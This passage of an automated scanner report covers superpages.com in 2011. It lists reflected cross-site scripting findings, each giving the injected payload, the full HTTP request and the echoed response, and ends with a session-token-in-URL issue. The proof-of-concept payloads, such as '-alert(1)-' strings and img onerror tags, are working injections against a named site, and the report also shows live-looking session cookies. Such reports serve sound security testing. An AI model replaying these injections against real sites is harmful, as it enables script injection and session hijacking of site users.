Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: SPC=1296750623993-www.superpages.com-28426864-914831; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:30:23 GMT; Path=/
Set-Cookie: JSESSIONID=265FBF1301E359B78C423E3003AF80EE; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:30:23 GMT
Connection: close
Content-Length: 23380


<!--
-->
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
<head>
<title>
Superpages.com
...[SNIP]...
ype="two";
var actualUrl = "http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1843a2"-alert(1)-"a8e7c8583e3";
var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//-->
...[SNIP]...

1.11. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [bidType parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm

Issue detail

The value of the bidType request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5dd4"-alert(1)-"d9f9799ecf8 was submitted in the bidType parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIKb5dd4"-alert(1)-"d9f9799ecf8&TR=1 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: SPC=1296750603809-www.superpages.com-9081164-800011; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:30:03 GMT; Path=/
Set-Cookie: JSESSIONID=219F120FEB2F8290C38E110E827DE695; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:30:03 GMT
Content-Length: 66496

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Ally Bank in Philad
...[SNIP]...
archtype="two";
var actualUrl = "http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIKb5dd4"-alert(1)-"d9f9799ecf8&TR=1";
var client_id = "133515049997773";
var redirecturl = 'http://www.superpages.com/bp/Facebook?prev=yp_profile';
//-->
...[SNIP]...

1.12. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [lbp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm

Issue detail

The value of the lbp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f71cf"-alert(1)-"8b1ed61181f was submitted in the lbp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1f71cf"-alert(1)-"8b1ed61181f&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: SPC=1296750510916-www.superpages.com-5233303-969715; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:28:30 GMT; Path=/
Set-Cookie: JSESSIONID=742BF78E1A6BFC3ABF53A5C98640882B; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:28:30 GMT
Content-Length: 60956

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Ally Bank - Handlin
...[SNIP]...
= 'http://www.superpages.com';
var searchtype="two";
searchtype="two";
var actualUrl = "http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1f71cf"-alert(1)-"8b1ed61181f&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1";
var client_id = "133515049997773";
var redirecturl = 'http://www.superpages.com/bp/Facebook?prev=yp_profile';
//-->
...[SNIP]...

1.13. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7992e"-alert(1)-"47024e3844d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1&7992e"-alert(1)-"47024e3844d=1 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: SPC=1296750649070-www.superpages.com-20879668-932317; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:30:49 GMT; Path=/
Set-Cookie: JSESSIONID=3B2D663DFEFD640AA8C05C35E7490265; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:30:48 GMT
Content-Length: 23390


<!--
-->
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
<head>
<title>
Superpages.com
...[SNIP]...
pe="two";
var actualUrl = "http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1&7992e"-alert(1)-"47024e3844d=1";
var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//-->
...[SNIP]...

1.14. http://www.superpages.com/bp/xmlproxy [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/xmlproxy

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f53dc"-alert(1)-"b9a871a93d9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bp/xmlproxyf53dc"-alert(1)-"b9a871a93d9?url=http%3A%2F%2Fugc-int.superpages.com%2Fugcwiki%2FGetPhotoServlet%3FlistingId%3D2118363360 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_cc=true; s_lastvisit=1296748870245; s_pv=Business%20Profile; s_dfa=superpagescom; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: web=; Domain=.superpages.com; Path=/
Set-Cookie: shopping=; Domain=.superpages.com; Path=/
Set-Cookie: yp=; Domain=.superpages.com; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:03:55 GMT
Content-Length: 57628

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="JavaScript" type="text/javascript">
document.cookie="OpenPhones=";
</script>
<h
...[SNIP]...
ellowpages.superpages.com';
var var_account = 'Superpagescom';
var hostServ = 'http://www.superpages.com';
var searchtype="two";
searchtype="one";
var actualUrl = "http://www.superpages.com/bp/xmlproxyf53dc"-alert(1)-"b9a871a93d9?url=http%3A%2F%2Fugc-int.superpages.com%2Fugcwiki%2FGetPhotoServlet%3FlistingId%3D2118363360";
var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//-->
...[SNIP]...

1.15. http://www.superpages.com/coupons [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /coupons

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3b22"-alert(1)-"6172bed7d5b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coupons?f3b22"-alert(1)-"6172bed7d5b=1 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: JSESSIONID=14A03C36B158EBE2AE84FEB1EA46C2E7; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 74692
Date: Thu, 03 Feb 2011 17:09:46 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="h
...[SNIP]...
//yellowpages.superpages.com';
var var_account = 'Superpagescom';
var hostServ = 'http://www.superpages.com';
var searchtype="two";
searchtype="one";
var actualUrl = "http://www.superpages.com/coupons?f3b22"-alert(1)-"6172bed7d5b=1";
var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//-->
...[SNIP]...

1.16. http://www.superpages.com/inc/social/sln.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /inc/social/sln.php

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54e04"-alert(1)-"5dda26f052b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inc/social/54e04"-alert(1)-"5dda26f052b?n=5&t=Ally+Bank+in+Philadelphia%2C+PA+%7C+P+O+Box+13625%2C+Philadelphia%2C+PA&u=http://yellowpages.superpages.com%2Fbp%2FUS%2FAlly-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm%3FSRC%3Dcomlocal1a%26lbp%3D1%26PGID%3Ddalms102.8089.1296748577335.307646855%26bidType%3DCLIK%26TR%3D1&s=1 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.1 404 /inc/social/54e04&quot;-alert(1)-&quot;5dda26f052b
Server: Unspecified
Set-Cookie: JSESSIONID=E867CF351209BE67050698C0585FCB01; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 17:06:55 GMT
Connection: close


                       <!--
       
       -->


                                   
...[SNIP]...
var hostServ = 'http://www.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://www.superpages.com/inc/social/54e04"-alert(1)-"5dda26f052b?n=5&t=Ally+Bank+in+Philadelphia%2C+PA+%7C+P+O+Box+13625%2C+Philadelphia%2C+PA&u=http://yellowpages.superpages.com%2Fbp%2FUS%2FAlly-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm%3FSRC%3Dcomloc
...[SNIP]...

1.17. http://www.superpages.com/yellowpages/C-Banks [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /yellowpages/C-Banks

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43ba5"><img%20src%3da%20onerror%3dalert(1)>935e0c29137 was submitted in the REST URL parameter 2. This input was echoed as 43ba5"><img src=a onerror=alert(1)>935e0c29137 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /yellowpages/C-Banks43ba5"><img%20src%3da%20onerror%3dalert(1)>935e0c29137 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 17:07:36 GMT
Server: Unspecified
Vary: Host
Last-Modified: Thu, 03 Feb 2011 17:07:36GMT
Content-Length: 59492
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:22:36 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<META NAME="TITLE" CONTENT="Banks43ba5"><img Src=a Onerror=alert(1)>935e0c29137 in Yellow Pages by SuperPages">
...[SNIP]...

1.18. http://www.superpages.com/yellowpages/C-Banks [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /yellowpages/C-Banks

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4500c<img%20src%3da%20onerror%3dalert(1)>46b2d68491a was submitted in the REST URL parameter 2. This input was echoed as 4500c<img src=a onerror=alert(1)>46b2d68491a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /yellowpages/C-Banks4500c<img%20src%3da%20onerror%3dalert(1)>46b2d68491a HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 17:07:45 GMT
Server: Unspecified
Vary: Host
Last-Modified: Thu, 03 Feb 2011 17:07:46GMT
Content-Length: 58480
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:22:46 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<META NAME="TITLE" CONTENT="Banks4500c<img Src=a Onerror=alert(1)>46b2d68491a in Y
...[SNIP]...
<h1>Select a State to view Banks4500c<img Src=a Onerror=alert(1)>46b2d68491a Listings </h1>
...[SNIP]...

1.19. http://www.superpages.com/yellowpages/C-Banks [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /yellowpages/C-Banks

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload bf72b<img%20src%3da%20onerror%3dalert(1)>ee7e8ccc6d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf72b<img src=a onerror=alert(1)>ee7e8ccc6d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /yellowpages/C-Banks?bf72b<img%20src%3da%20onerror%3dalert(1)>ee7e8ccc6d1=1 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 17:07:06 GMT
Server: Unspecified
Vary: Host
Last-Modified: Thu, 03 Feb 2011 17:07:06GMT
Content-Length: 59798
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:22:06 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<META NAME="TITLE" CONTENT="Banks?bf72b<img Src=a Onerror=alert(1)>ee7e8ccc6d1=1 i
...[SNIP]...
<h1>Select a State to view Banks?bf72b<img Src=a Onerror=alert(1)>ee7e8ccc6d1=1 Listings </h1>
...[SNIP]...

1.20. http://www.superpages.com/yellowpages/C-Banks [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /yellowpages/C-Banks

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41c54"><img%20src%3da%20onerror%3dalert(1)>2bfa6c73542 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 41c54"><img src=a onerror=alert(1)>2bfa6c73542 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /yellowpages/C-Banks?41c54"><img%20src%3da%20onerror%3dalert(1)>2bfa6c73542=1 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 17:06:55 GMT
Server: Unspecified
Vary: Host
Last-Modified: Thu, 03 Feb 2011 17:06:56GMT
Content-Length: 60810
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:21:56 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<META NAME="TITLE" CONTENT="Banks?41c54"><img Src=a Onerror=alert(1)>2bfa6c73542=1 in Yellow Pages by SuperPages">
...[SNIP]...

1.21. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af436"-alert(1)-"c8d45d1ae80 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10af436"-alert(1)-"c8d45d1ae80
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: SPC=1296750668049-www.superpages.com-11243779-100942; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:31:08 GMT; Path=/
Set-Cookie: JSESSIONID=70291ECCDC9094D55B86156B11544BBB; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:07 GMT
Content-Length: 65808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Ally Bank in Philad
...[SNIP]...

var remote_add = "REMOTE_ADDR=173.193.214.243";
var http_user = "HTTP_USER_AGENT=Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10af436"-alert(1)-"c8d45d1ae80";
var datServ = 'http://ugc-int.superpages.com';
var imgLoc = "http://img.superpages.com/images-yp/sp/images/ugc/";
var imServ = 'http://media.superpages.com/media/photos/';
var lidforpageload = '2118
...[SNIP]...

2. Session token in URL  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.superpages.com
Path:   /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm

Issue detail

The response contains the following links that appear to contain session tokens:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

Request

GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: JSESSIONID=143D8CEECE171005D85B3D31E8E959E2; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 115257
Date: Thu, 03 Feb 2011 17:05:28 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
